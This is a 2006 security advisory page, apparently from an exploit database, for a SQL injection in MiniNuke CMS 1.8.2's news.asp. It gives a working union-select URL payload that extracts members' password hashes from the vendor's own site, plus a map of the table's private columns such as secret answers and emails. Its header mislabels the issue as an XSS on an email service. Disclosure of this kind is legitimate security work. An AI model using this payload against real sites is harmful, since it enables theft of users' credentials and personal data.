MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injectionvulnerability

2006.01.13
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report-- Advisory: XSS attack on Superonline.com email service. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 12/01/06 08:47 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: MiniNuke (www.miniex.net) Version: 1.8.2 and prior versions must be affected. About:Via this method remote attacker can inject SQL query to the news.asp --- How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifr e,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 Columns of MEMBERS: uye_id = userid sifre = md5 password hash g_soru = secret question. g_cevap = secret answer email = mail address isim = name icq = ICQ Uin msn = MSN Sn. aim = AIM Sn. meslek = job cinsiyet = gender yas = age url = url imza = signature mail_goster = show mail :P avurl = avatar url avatar = avatar -- Thanks to ajan;) Regards, From the NWPX team, nuker a.k.a nukedx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top